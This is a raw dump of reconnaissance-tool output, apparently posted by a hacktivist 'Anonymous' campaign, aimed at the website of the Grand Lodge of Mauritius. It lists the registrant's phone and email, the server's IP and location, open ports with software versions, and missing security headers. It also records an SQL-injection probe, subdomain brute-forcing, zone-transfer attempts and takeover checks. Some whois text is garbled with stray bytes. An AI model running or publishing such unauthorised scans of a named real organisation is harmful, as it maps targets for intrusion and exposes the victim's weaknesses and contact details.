Anonymous JTSEC #OPkilluminatie full recon #18

#######################################################################################################################################
Hostname 	www.glmasonica.com 	  	ISP 	Savvis (AS3561)
Continent 	North America 	  	Flag
US
Country 	United States 	  	Country Code 	US (USA)
Region 	MA 	  	Local time 	15 Apr 2018 21:43 EDT
Metropolis* 	Boston		  	Postal Code 	02451
City 	Waltham 	  	Latitude 	42.403
IP Address 	192.252.149.45 	  	Longitude 	-71.259
#######################################################################################################################################
HostIP:192.252.149.45
HostName:glmasonica.com

Gathered Inet-whois information for 192.252.149.45
---------------------------------------------------------------------------------------------------------------------------------------


inetnum:        192.251.231.0 - 192.255.255.255
netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr:          IPv4 address block not managed by the RIPE NCC
remarks:        ------------------------------------------------------
remarks:
remarks:        You can find the whois server to query, or the
remarks:        IANA registry to query on this web page:
remarks:        http://www.iana.org/assignments/ipv4-address-space
remarks:
remarks:        You can access databases of other RIRs at:
remarks:
remarks:        AFRINIC (Africa)
remarks:        http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks:        APNIC (Asia Pacific)
remarks:        http://www.apnic.net/ whois.apnic.net
remarks:
remarks:        ARIN (Northern America)
remarks:        http://www.arin.net/  whois.arin.net
remarks:
remarks:        LACNIC (Latin America and the Carribean)
remarks:        http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks:        IANA IPV4 Recovered Address Space
remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
remarks:
remarks:        ------------------------------------------------------
country:        EU # Country is really world wide
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
status:         ALLOCATED UNSPECIFIED
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RIPE-NCC-HM-MNT
mnt-routes:     RIPE-NCC-RPSL-MNT
created:        2018-03-02T09:54:33Z
last-modified:  2018-03-02T09:54:33Z
source:         RIPE

role:           Internet Assigned Numbers Authority
address:        see http://www.iana.org.
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
nic-hdl:        IANA1-RIPE
remarks:        For more information on IANA services
remarks:        go to IANA web site at http://www.iana.org.
mnt-by:         RIPE-NCC-MNT
created:        1970-01-01T00:00:00Z
last-modified:  2001-09-22T09:31:27Z
source:         RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)


Gathered Inic-whois information for glmasonica.com
---------------------------------------------------------------------------------------------------------------------------------------
   Domain Name: GLMASONICA.COM
   Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.enom.com
   Registrar URL: http://www.enom.com
   Updated Date: 2018-02-09T11:03:06Z
   Creation Date: 2011-02-11T08:34:04Z
   Registry Expiry Date: 2019-02-11T08:34:04Z
   Registrar: eNom, Inc.
   Registrar IANA ID: 48
   Registrar Abuse Contact Email:
   Registrar Abuse Contact Phone:
   Domain Status: clientTransferProhibited https�U@ed
   Name Server: NS1.SERVER308.COM
   Name Server: NS2.SERVER308.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-04-16T01:46:24Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not neceYV@ssariFZA�ly# refle8�'K�ctXV@ the E�'K�exgV@pirat��������ion
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access o�U@query�]A� o0ur Who��'K�isU@
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois qu�U@you a�]A�gr�ee to ��'K�abU@ide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this �U@Data �]A�is� expre7�'K�ssU@ly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these ter�U@ms of�]A� use. Ver̷'K�iSU@ign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Gathered Netcraft information for glmasonica.com
---------------------------------------------------------------------------------------------------------------------------------------

Retrieving Netcraft.com information for glmasonica.com
Netcraft.com Information gathered

Gathered Subdomain information for glmasonica.com
--------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
HostName:www.glmasonica.com
HostIP:192.252.149.45
Searching Altavista.com:80...
Found 1 possible subdomain(s) for host glmasonica.com, Searched 0 pages containing 0 results

Gathered E-Mail information for glmasonica.com
---------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 E-Mail(s) for host glmasonica.com, Searched 0 pages containing 0 results

Gathered TCP Port information for 192.252.149.45
---------------------------------------------------------------------------------------------------------------------------------------

 Port		State

21/tcp		open
22/tcp		open
80/tcp		open
143/tcp		open

Portscan Finished: Scanned 150 ports, 0 ports were in state closed
#######################################################################################################################################
[i] Scanning Site: http://glmasonica.com


B A S I C   I N F O
=======================================================================================================================================


[+] Site Title: Grande Loge De Maurice
[+] IP address: 192.252.149.45
[+] Web Server: Apache
[+] CMS: Could Not Detect
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!


W H O I S   L O O K U P
=======================================================================================================================================

	   Domain Name: GLMASONICA.COM
   Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.enom.com
   Registrar URL: http://www.enom.com
   Updated Date: 2018-02-09T11:03:06Z
   Creation Date: 2011-02-11T08:34:04Z
   Registry Expiry Date: 2019-02-11T08:34:04Z
   Registrar: eNom, Inc.
   Registrar IANA ID: 48
   Registrar Abuse Contact Email:
   Registrar Abuse Contact Phone:
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: NS1.SERVER308.COM
   Name Server: NS2.SERVER308.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-04-16T01:46:24Z <<<

For more information on Whois status codes, please visit https://icann.org/epp


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.


G E O  I P  L O O K  U P
=======================================================================================================================================

[i] IP Address: 192.252.149.45
[i] Country: US
[i] State: Massachusetts
[i] City: Waltham
[i] Latitude: 42.403000
[i] Longitude: -71.259003


H T T P   H E A D E R S
=======================================================================================================================================


[i]  HTTP/1.1 200 OK
[i]  Date: Mon, 16 Apr 2018 01:46:40 GMT
[i]  Server: Apache
[i]  Expires: Thu, 19 Nov 1981 08:52:00 GMT
[i]  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
[i]  Pragma: no-cache
[i]  Set-Cookie: projector=13fe947520f28f594bf9d7e975093f0c; path=/
[i]  Connection: close
[i]  Content-Type: text/html


D N S   L O O K U P
=======================================================================================================================================

;; Truncated, retrying in TCP mode.
glmasonica.com.		2560	IN	SOA	ns1.server308.com. hostmaster.glmasonica.com. 1523828373 16384 2048 1048576 2560
glmasonica.com.		25920	IN	NS	ns1.server308.com.
glmasonica.com.		25920	IN	NS	ns2.server308.com.
glmasonica.com.		14400	IN	MX	0 mail.glmasonica.com.
glmasonica.com.		14400	IN	A	192.252.149.45


S U B N E T   C A L C U L A T I O N
=======================================================================================================================================

Address       = 192.252.149.45
Network       = 192.252.149.45 / 32
Netmask       = 255.255.255.255
Broadcast     = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits    = 0
Max. Hosts    = 1   (2^0 - 0)
Host Range    = { 192.252.149.45 - 192.252.149.45 }


N M A P   P O R T   S C A N
=======================================================================================================================================


Starting Nmap 7.01 ( https://nmap.org ) at 2018-04-16 01:46 UTC
Nmap scan report for glmasonica.com (192.252.149.45)
Host is up (0.015s latency).
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           ProFTPD
22/tcp   open     ssh           OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
23/tcp   filtered telnet
25/tcp   open     smtp          netqmail smtpd 1.04
80/tcp   open     http          Apache httpd
110/tcp  open     pop3          Dovecot pop3d
143/tcp  open     imap          Dovecot imapd
443/tcp  open     ssl/ssl       Apache httpd (SSL-only mode)
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Service Info: Host: 192.252.149.45; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds

#######################################################################################################################################
<pre><font color="#FCE94F"><b>[!]</b></font> IP Address : 192.252.149.45
<font color="#FCE94F"><b>[!]</b></font> Server: Apache
<font color="#8AE234"><b>[+]</b></font> Clickjacking protection is not in place.
<font color="#8AE234"><b>[+]</b></font> Operating System : Debian&amp;#34;
  },
  &amp;#34;993&amp;#34;: {
    &amp;#34;imaps&amp;#34;: {
      &amp;#34;tls&amp;#34;: {
        &amp;#34;tls&amp;#34;: {
          &amp;#34;server_key_exchange&amp;#34;: {
            &amp;#34;ecdh_params&amp;#34;: {
              &amp;#34;curve_id&amp;#34;: {
                &amp;#34;id&amp;#34;: 23,
                &amp;#34;name&amp;#34;: &amp;#34;secp256r1&amp;#34;
              }
            }
          },
          &amp;#34;certificate&amp;#34;: {
            &amp;#34;parsed&amp;#34;: {
              &amp;#34;fingerprint_sha1&amp;#34;: &amp;#34;5e5415f6edece4cb2c1913c05b07a33a89fbb4d0&amp;#34;,
              &amp;#34;tbs_noct_fingerprint&amp;#34;: &amp;#34;cab5cdc850c8153ea3bc4a1b31f2d48b54af1dfd6f4228c1233652effbba14a9&amp;#34;,
              &amp;#34;subj
<font color="#FCE94F"><b>[!]</b></font> www.glmasonica.com doesn&apos;t seem to use a CMS
<font color="#8AE234"><b>[+]</b></font> Honeypot Probabilty: 30%
<font color="#EF2929"><b>----------------------------------------</b></font>
<font color="#EEEEEC"><b>[~]</b></font> Trying to gather whois information for www.glmasonica.com
<font color="#8AE234"><b>[+]</b></font> Whois information found
<font color="#EF2929"><b>[-]</b></font> Unable to build response, visit https://who.is/whois/www.glmasonica.com
<font color="#EF2929"><b>----------------------------------------</b></font>
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           ProFTPD
22/tcp   open     ssh           OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
23/tcp   filtered telnet
25/tcp   open     smtp          netqmail smtpd 1.04
80/tcp   open     http          Apache httpd
110/tcp  open     pop3          Dovecot pop3d
143/tcp  open     imap          Dovecot imapd
443/tcp  open     ssl/http      Apache httpd
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server
<font color="#EF2929"><b>----------------------------------------</b></font>

<font color="#8AE234"><b>[+]</b></font> DNS Records

<font color="#8AE234"><b>[+]</b></font> Host Records (A)
www.glmasonica.comHTTP: (192.252.149.45) AS3561 Savvis United States

<font color="#8AE234"><b>[+]</b></font> TXT Records

<font color="#8AE234"><b>[+]</b></font> DNS Map: https://dnsdumpster.com/static/map/glmasonica.com.png

<font color="#EEEEEC"><b>[&gt;]</b></font> Initiating 3 intel modules
<font color="#EEEEEC"><b>[&gt;]</b></font> Loading Alpha module (1/3)
<font color="#EEEEEC"><b>[&gt;]</b></font> Beta module deployed (2/3)
<font color="#EEEEEC"><b>[&gt;]</b></font> Gamma module initiated (3/3)


[+] Emails found:
------------------
pixel-1523843228738161-web-@www.glmasonica.com
pixel-1523843231359027-web-@www.glmasonica.com
No hosts found
[+] Virtual hosts:
-----------------
<font color="#EEEEEC"><b>[~]</b></font> Crawling the target for fuzzable URLs
<font color="#8AE234"><b>[+]</b></font> Found 2 fuzzable URLs
http://www.glmasonica.com//introduction.php?l=fr
<font color="#EEEEEC"><b>[~]</b></font> Using SQLMap api to check for SQL injection vulnerabilities. Don&apos;t worry we are using an online service and it doesn&apos;t depend on your internet connection. This scan will take 2-3 minutes.
<font color="#EF2929"><b>[-]</b></font> None of parameters is vulnerable to SQL injection
<font color="#8AE234"><b>[+]</b></font> These are the URLs having parameters:
http://www.glmasonica.com//introduction.php?l=fr
http://www.glmasonica.com//introduction.php?l=en
</pre>
#######################################################################################################################################
[*] Processing domain glmasonica.com
[+] Getting nameservers
192.252.150.21 - ns2.server308.com
192.252.149.21 - ns1.server308.com
[-] Zone transfer failed

[+] MX records found, added to target list
0 mail.glmasonica.com.

[+] Wildcard domain found - 192.252.149.45
[*] Scanning glmasonica.com for A records
#######################################################################################################################################
Original*      glmasonica.com     192.252.149.45 NS:ns1.server308.com MX:mail.glmasonica.com
Subdomain      gl.masonica.com    207.148.248.143
Subdomain      glm.asonica.com    66.96.132.120
Subdomain      glma.sonica.com    208.91.197.27
#######################################################################################################################################
Ip Address	Status	Type	Domain Name			Server
----------	------	----	-----------			------
192.252.149.45  400     host    ftp_.glmasonica.com		Apache
192.252.149.45          host    mta.glmasonica.com
192.252.149.45          host    mtu.glmasonica.com
192.252.149.45          host    mu.glmasonica.com
192.252.149.45          host    multimedia.glmasonica.com
192.252.149.45          host    music.glmasonica.com
192.252.149.45          host    mv.glmasonica.com
192.252.149.45          host    mw.glmasonica.com
192.252.149.45          host    mx.glmasonica.com
192.252.149.45          host    mx1.glmasonica.com
192.252.149.45          host    my.glmasonica.com
192.252.149.45          host    mysql.glmasonica.com
192.252.149.45          host    mysql0.glmasonica.com
192.252.149.45          host    mysql01.glmasonica.com
192.252.149.45  400     host    ns_.glmasonica.com		Apache
192.252.149.45          host    problemtracker.glmasonica.com
192.252.149.45          host    products.glmasonica.com
192.252.149.45          host    profiles.glmasonica.com
192.252.149.45          host    project.glmasonica.com
192.252.149.45          host    projects.glmasonica.com
192.252.149.45          host    promo.glmasonica.com
192.252.149.45          host    prueba.glmasonica.com
192.252.149.45          host    pruebas.glmasonica.com
192.252.149.45          host    ps.glmasonica.com
192.252.149.45          host    psi.glmasonica.com
192.252.149.45          host    pss.glmasonica.com
192.252.149.45          host    pt.glmasonica.com
192.252.149.45          host    pub.glmasonica.com
192.252.149.45          host    public.glmasonica.com
192.252.149.45          host    pubs.glmasonica.com
192.252.149.45          host    purple.glmasonica.com
192.252.149.45          host    read.glmasonica.com
192.252.149.45          host    realserver.glmasonica.com
192.252.149.45          host    recruiting.glmasonica.com
192.252.149.45          host    red.glmasonica.com
192.252.149.45          host    redhat.glmasonica.com
192.252.149.45          host    ref.glmasonica.com
192.252.149.45          host    reference.glmasonica.com
192.252.149.45          host    reg.glmasonica.com
192.252.149.45          host    register.glmasonica.com
192.252.149.45          host    rtr.glmasonica.com
192.252.149.45          host    rtr1.glmasonica.com
192.252.149.45          host    ru.glmasonica.com
192.252.149.45          host    s1.glmasonica.com
192.252.149.45          host    s2.glmasonica.com
192.252.149.45          host    sa.glmasonica.com
192.252.149.45          host    sac.glmasonica.com
192.252.149.45          host    sacramento.glmasonica.com
192.252.149.45  302     host    webmail.glmasonica.com		Apache
192.252.149.45  200     host    www.glmasonica.com		Apache
192.252.149.45  400     host    www_.glmasonica.com		Apache
######################################################################################################################################
-------------------------------------------------------------------------------------------------------------------------------------
+ Target IP:          192.252.149.45
+ Target Hostname:    glmasonica.com
+ Target Port:        80
+ Start Time:         2018-04-15 22:09:38 (GMT-4)
---------------------------------------------------------------------------------------------------------------------------------------
+ Server: Apache
+ Cookie projector created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: choice
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated:  0 error(s) and 6 item(s) reported on remote host
+ End Time:           2018-04-15 22:23:52 (GMT-4) (854 seconds)
---------------------------------------------------------------------------------------------------------------------------------------
+ 1 host(s) tested
#######################################################################################################################################
Server:		10.211.254.254
Address:	10.211.254.254#53

Non-authoritative answer:
Name:	glmasonica.com
Address: 192.252.149.45

glmasonica.com has address 192.252.149.45
glmasonica.com mail is handled by 0 mail.glmasonica.com.
#######################################################################################################################################
Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is glmasonica.com
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 192.252.149.45. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 192.252.149.45. Module test failed
[-] No distance calculation. 192.252.149.45 appears to be dead or no ports known
[+] Host: 192.252.149.45 is up (Guess probability: 50%)
[+] Target: 192.252.149.45 is alive. Round-Trip Time: 0.47967 sec
[+] Selected safe Round-Trip Time value is: 0.95934 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[-] fingerprint:smb need either TCP port 139 or 445 to run
[+] Primary guess:
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Other guesses:
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Host 192.252.149.45 Running OS:  (Guess probability: 91%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.
#######################################################################################################################################
   Domain Name: GLMASONICA.COM
   Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.enom.com
   Registrar URL: http://www.enom.com
   Updated Date: 2018-02-09T11:03:06Z
   Creation Date: 2011-02-11T08:34:04Z
   Registry Expiry Date: 2019-02-11T08:34:04Z
   Registrar: eNom, Inc.
   Registrar IANA ID: 48
   Registrar Abuse Contact Email:
   Registrar Abuse Contact Phone:
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: NS1.SERVER308.COM
   Name Server: NS2.SERVER308.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2018-04-16T02:31:28Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.


Domain Name: GLMASONICA.COM
Registry Domain ID: 1639647625_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2018-02-06T04:16:52.00Z
Creation Date: 2011-02-11T08:34:00.00Z
Registrar Registration Expiration Date: 2019-02-11T08:34:04.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Reseller: SURESUPPORT.COM
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
Registrant Organization: GRAND LODGE OF MAURITIUS
Registrant Street: BARACHOIS ESTATE
Registrant Street: NA
Registrant City: TAMARIN
Registrant State/Province: NA
Registrant Postal Code: 0000
Registrant Country: MU
Registrant Phone: +230.4834439
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: INFO@IMSMAURITIUS.COM
Registry Admin ID:
Admin Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
Admin Organization: GRAND LODGE OF MAURITIUS
Admin Street: BARACHOIS ESTATE
Admin Street: NA
Admin City: TAMARIN
Admin State/Province: NA
Admin Postal Code: 0000
Admin Country: MU
Admin Phone: +230.4834439
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: INFO@IMSMAURITIUS.COM
Registry Tech ID:
Tech Name: GRAND LODGE OF MAURITIUS GRAND LODGE OF MAURITIUS
Tech Organization: GRAND LODGE OF MAURITIUS
Tech Street: BARACHOIS ESTATE
Tech Street: NA
Tech City: TAMARIN
Tech State/Province: NA
Tech Postal Code: 0000
Tech Country: MU
Tech Phone: +230.4834439
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: INFO@IMSMAURITIUS.COM
Name Server: NS1.SERVER308.COM
Name Server: NS2.SERVER308.COM
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4259744689
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-02-06T04:16:52.00Z <<<

For more information on Whois status codes, please visit https://icann.org/epp


The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about or
related to a domain name registration record. We make this information
available "as is," and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data to: (1)
enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or (2) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic
mail, or by telephone. The compilation, repackaging, dissemination or
other use of this data is expressly prohibited without prior written
consent from us.

We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002

Get Noticed on the Internet!  Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
#######################################################################################################################################

; <<>> DiG 9.11.3-1-Debian <<>> -x glmasonica.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42747
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;com.glmasonica.in-addr.arpa.	IN	PTR

;; AUTHORITY SECTION:
in-addr.arpa.		604	IN	SOA	b.in-addr-servers.arpa. nstld.iana.org. 2018013344 1800 900 604800 3600

;; Query time: 404 msec
;; SERVER: 10.211.254.254#53(10.211.254.254)
;; WHEN: Sun Apr 15 22:31:47 EDT 2018
;; MSG SIZE  rcvd: 124

dnsenum VERSION:1.2.4

-----   glmasonica.com   -----


Host's addresses:
__________________

glmasonica.com.                          11683    IN    A        192.252.149.45


Wildcard detection using: nzifomoigzmu
_______________________________________

nzifomoigzmu.glmasonica.com.             14400    IN    A        192.252.149.45


!!!!!!!!!!!!!!!!!!!!!!!!!!!!

 Wildcards detected, all subdomains will point to the same IP address
 Omitting results containing 192.252.149.45.
 Maybe you are using OpenDNS servers.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!


Name Servers:
______________

ns2.server308.com.                       12328    IN    A        192.252.150.21
ns1.server308.com.                       12329    IN    A        192.252.149.21


Mail (MX) Servers:
___________________

mail.glmasonica.com.                     12352    IN    A        192.252.149.45


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for glmasonica.com on ns2.server308.com ...

Trying Zone Transfer for glmasonica.com on ns1.server308.com ...

brute force file not specified, bay.
######################################################################################################################################
[-] Enumerating subdomains now for glmasonica.com
[-] verbosity is enabled, will show the subdomains results in realtime
[-] Searching now in Baidu..
[-] Searching now in Yahoo..
[-] Searching now in Google..
[-] Searching now in Bing..
[-] Searching now in Ask..
[-] Searching now in Netcraft..
[-] Searching now in DNSdumpster..
[-] Searching now in Virustotal..
[-] Searching now in ThreatCrowd..
[-] Searching now in SSL Certificates..
[-] Searching now in PassiveDNS..
Virustotal: mail.glmasonica.com
Virustotal: www.glmasonica.com
DNSdumpster: mail.glmasonica.com
Yahoo: www.glmasonica.com
[-] Saving results to file: /usr/share/sniper/loot/glmasonica.com/domains/domains-glmasonica.com.txt
[-] Total Unique Subdomains Found: 2
www.glmasonica.com
mail.glmasonica.com
#######################################################################################################################################
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  discover v0.5.0 - by @michenriksen

Identifying nameservers for glmasonica.com... Done
Using nameservers:

 - 192.252.149.21
 - 192.252.150.21

Checking for wildcard DNS... Wildcard detected!
Identifying wildcard IPs... Done
Filtering out hosts resolving to wildcard IPs

Running collector: HackerTarget... Done (1 host)
Running collector: Shodan... Skipped
 -> Key 'shodan' has not been set
Running collector: Wayback Machine... Done (2 hosts)
Running collector: Riddler... Skipped
 -> Key 'riddler_username' has not been set
Running collector: Certificate Search... Done (0 hosts)
Running collector: Google Transparency Report... Done (0 hosts)
Running collector: PTRArchive... Error
 -> PTRArchive returned unexpected response code: 502
Running collector: Censys... Skipped
 -> Key 'censys_secret' has not been set
Running collector: PassiveTotal... Skipped
 -> Key 'passivetotal_key' has not been set
Running collector: VirusTotal... Skipped
 -> Key 'virustotal' has not been set
Running collector: Netcraft... Done (0 hosts)
Running collector: Threat Crowd... Done (0 hosts)
Running collector: Dictionary... Done (26 hosts)
Running collector: PublicWWW... Done (2 hosts)
Running collector: DNSDB... Done (2 hosts)

Resolving 30 unique hosts...


Wrote 0 hosts to:

 - file:///root/aquatone/glmasonica.com/hosts.txt
 - file:///root/aquatone/glmasonica.com/hosts.json
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  takeover v0.5.0 - by @michenriksen

Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
Loaded 25 domain takeover detectors

Identifying nameservers for glmasonica.com... Done
Using nameservers:

 - 192.252.150.21
 - 192.252.149.21

Checking hosts for domain takeover vulnerabilities...

Finished checking hosts:

 - Vulnerable     : 0
 - Not Vulnerable : 0

Wrote 0 potential subdomain takeovers to:

 - file:///root/aquatone/glmasonica.com/takeovers.json

                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  scan v0.5.0 - by @michenriksen

Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json

Probing 0 ports...

Wrote open ports to file:///root/aquatone/glmasonica.com/open_ports.txt
Wrote URLs to file:///root/aquatone/glmasonica.com/urls.txt
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
